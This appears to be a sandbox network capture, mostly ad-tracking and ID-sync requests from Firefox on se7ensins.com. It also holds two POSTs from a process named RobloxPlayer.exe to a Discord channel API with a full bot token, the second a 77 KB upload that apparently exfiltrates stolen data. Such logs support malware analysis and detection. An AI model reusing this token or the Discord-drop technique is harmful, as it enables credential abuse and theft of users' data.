https://token.rubiconproject.com/token?pid=50242&puid=AU1D-0100-001716689186-TBCHXBQA-GKIV&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

firefox.exe

Remote address:

69.173.156.148:443

Request

GET /token?pid=50242&puid=AU1D-0100-001716689186-TBCHXBQA-GKIV&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/1.1
Host: token.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Referer: https://www.se7ensins.com/
Connection: keep-alive

Response

HTTP/1.1 204 No Content

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: 0
X-RPHost: 17c962550296893d145ef1b8078fc6d6
set-cookie: khaos=LWMWF4EX-7-993T; Max-Age=31536000; Expires=Mon, 26 May 2025 02:06:29 GMT; Path=/; Domain=.rubiconproject.com; Secure; SameSite=None
GET

https://cm.g.doubleclick.net/pixel?google_nid=audigent_w_appnexus_3985&google_cm&google_sc&google_ula=450542624&id=AU1D-0100-001716689186-TBCHXBQA-GKIV

firefox.exe

Remote address:

142.250.200.2:443

Request

GET /pixel?google_nid=audigent_w_appnexus_3985&google_cm&google_sc&google_ula=450542624&id=AU1D-0100-001716689186-TBCHXBQA-GKIV HTTP/2.0
host: cm.g.doubleclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://ad.360yield.com/ux?&publisher_dmp_id=15&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fimpr_match%3Fid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26impr_uid%3D%7BPUB_USER_ID%7D

firefox.exe

Remote address:

52.48.62.133:443

Request

GET /ux?&publisher_dmp_id=15&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fimpr_match%3Fid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26impr_uid%3D%7BPUB_USER_ID%7D HTTP/2.0
host: ad.360yield.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:29 GMT
content-type: image/gif
content-length: 43
access-control-allow-origin: *
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
GET

https://sync.go.sonobi.com/us?https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=[UID]&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

firefox.exe

Remote address:

69.166.1.66:443

Request

GET /us?https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=[UID]&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: sync.go.sonobi.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 302

date: Sun, 26 May 2024 02:06:30 GMT
content-type: text/plain; charset=utf8
content-length: 0
expires: Sat, 26 Jul 1997 05:00:00 GMT
cache-control: no-cache, no-store, private
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
pragma: no-cache
tcn: Choice
vary: negotiate,Accept-Encoding
x-go-server: go-iad-2-6-142
x-xss-protection: 0
location: https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001716689186-TBCHXBQA-GKIV&uid=4cbdb081-eac7-46d0-aa2c-aa791852dd26&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
set-cookie: __uis=4cbdb081-eac7-46d0-aa2c-aa791852dd26; expires=Tue, 25 Jun 2024 02:06:29 GMT; domain=.go.sonobi.com; path=/; secure; SameSite=None
set-cookie: HAPLB8G=s86142|ZlKZK; path=/; domain=.go.sonobi.com; SameSite=none; Secure
server: sonobi-go
GET

https://u.openx.net/w/1.0/cm?id=998eaf06-9905-4eae-9e26-9fac75960c53&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fopenx%3Fopenx_id%3D%7BOPENX_ID%7D%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26auid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV

firefox.exe

Remote address:

35.244.159.8:443

Request

GET /w/1.0/cm?id=998eaf06-9905-4eae-9e26-9fac75960c53&r=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fopenx%3Fopenx_id%3D%7BOPENX_ID%7D%26id%3DAU1D-0100-001716689186-TBCHXBQA-GKIV%26auid%3DAU1D-0100-001716689186-TBCHXBQA-GKIV HTTP/2.0
host: u.openx.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://dnacdn.net/dna

firefox.exe

Remote address:

178.250.7.13:443

Request

GET /dna HTTP/2.0
host: dnacdn.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-length: 0
date: Sun, 26 May 2024 02:06:29 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-origin: https://www.se7ensins.com
cache-control: no-cache, no-store, must-revalidate
expires: 0
pragma: no-cache
set-cookie: browser_data=dduFWF9ra2VkUWoxdlk2d1lWNklYS1RzJTJCeURCcXBhVUJYeWdPMUpLVG5BOTglMkZ1T2tQcGpjNFViaVREUFNUeFh0eDRUU3dXb3JrdW10aGRma3BRd1pUVFRzWkElM0QlM0Q; expires=Fri, 20 Jun 2025 02:06:29 GMT; domain=dnacdn.net; path=/; secure; samesite=none
server-processing-duration-in-ticks: 130545
strict-transport-security: max-age=31536000; preload;
GET

https://lb.eu-1-id5-sync.com/lb/v1

firefox.exe

Remote address:

162.19.138.82:443

Request

GET /lb/v1 HTTP/2.0
host: lb.eu-1-id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

vary: Origin
vary: Access-Control-Request-Method
vary: Access-Control-Request-Headers
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
content-type: application/json;charset=UTF-8
date: Sun, 26 May 2024 02:06:29 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://secure.cdn.fastclick.net/js/pubcid/latest/pubcid.min.js

firefox.exe

Remote address:

23.53.174.156:443

Request

GET /js/pubcid/latest/pubcid.min.js HTTP/2.0
host: secure.cdn.fastclick.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

server: Apache
last-modified: Mon, 23 Jan 2023 19:40:17 GMT
etag: "d734-5f2f3919e751f-gzip"
accept-ranges: bytes
content-encoding: gzip
content-length: 17407
content-type: application/javascript
cache-control: max-age=900
expires: Sun, 26 May 2024 02:21:30 GMT
date: Sun, 26 May 2024 02:06:30 GMT
vary: Accept-Encoding
GET

https://cdn.id5-sync.com/api/1.0/id5-api.js

firefox.exe

Remote address:

104.22.53.86:443

Request

GET /api/1.0/id5-api.js HTTP/2.0
host: cdn.id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:30 GMT
content-type: text/javascript;charset=utf-8
x-amz-id-2: ft1/4uLJDpFdJy/b+LZUtxOoVULnlqBcX1WBLMR2n4SW57HVog5m1lVrRwbzna5TnfBmNjZVzrrxPRU30kyJPno9eaAjVx7awFsSh80DLV0=
x-amz-request-id: WNA8463J1AYR023G
last-modified: Wed, 08 May 2024 12:31:06 GMT
etag: W/"975872beea6fa436507d8a74321584b7"
x-amz-server-side-encryption: AES256
cache-control: public, max-age=3600
cf-cache-status: HIT
age: 1570
vary: Accept-Encoding
strict-transport-security: max-age=15552000; includeSubDomains; preload
server: cloudflare
cf-ray: 889a34cf8c1866e0-AMS
content-encoding: gzip
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:30 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=919869ac1b0411efa7acc6e17e964e03; Expires=Fri, 25-May-2029 02:06:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689191.774
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5fuQDwp5%2BZc3v061QnR76Dh84vU2L4iwzBp8Ah08uiPYTqaTFt%2FxXZtw2dbkGdlozq9i3VwF2YGnz934DJWwpuJzhRw9hhaIvEHcxT3x1DZmnpzaIK5d5dtrJLS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=919869ac1b0411efa7acc6e17e964e0326d2f98911df75c6f748240546cf3432cdc6d5f9e0b79b57125a4d6852a2b788; Expires=Fri, 25-May-2029 02:06:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=354b52d936a4ddff3396b0fae1acccdedc1b2c81-1716689190; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=l77MnxZjqCoCDklDQNfSTSLjLcBLgRi7drMZWv3a2Uw-1716689190872-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34d10db92411-LHR
DNS

2.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.200.250.142.in-addr.arpa

IN PTR

Response

2.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f21e100net
DNS

148.156.173.69.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.156.173.69.in-addr.arpa

IN PTR

Response
DNS

82.210.89.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

82.210.89.185.in-addr.arpa

IN PTR

Response

82.210.89.185.in-addr.arpa

IN PTR

952bm-nginx-loadbalancermgmtams3adnexusnet
DNS

8.159.244.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.159.244.35.in-addr.arpa

IN PTR

Response

8.159.244.35.in-addr.arpa

IN PTR

815924435bcgoogleusercontentcom
DNS

205.127.47.198.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.127.47.198.in-addr.arpa

IN PTR

Response
DNS

133.62.48.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.62.48.52.in-addr.arpa

IN PTR

Response

133.62.48.52.in-addr.arpa

IN PTR

ec2-52-48-62-133 eu-west-1compute amazonawscom
DNS

13.7.250.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.7.250.178.in-addr.arpa

IN PTR

Response
DNS

82.138.19.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

82.138.19.162.in-addr.arpa

IN PTR

Response

82.138.19.162.in-addr.arpa

IN PTR

ns31532337 ip-162-19-138eu
DNS

66.1.166.69.in-addr.arpa

Remote address:

8.8.8.8:53

Request

66.1.166.69.in-addr.arpa

IN PTR

Response
DNS

86.53.22.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.53.22.104.in-addr.arpa

IN PTR

Response
DNS

156.174.53.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

156.174.53.23.in-addr.arpa

IN PTR

Response

156.174.53.23.in-addr.arpa

IN PTR

a23-53-174-156deploystaticakamaitechnologiescom
DNS

64.179.233.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.179.233.3.in-addr.arpa

IN PTR

Response

64.179.233.3.in-addr.arpa

IN PTR

ec2-3-233-179-64 compute-1 amazonawscom
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: multipart/form-data; boundary="b40b664f-9157-496e-bdac-dc26f54b9ddf"
Host: discord.com
Content-Length: 77173
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:37 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
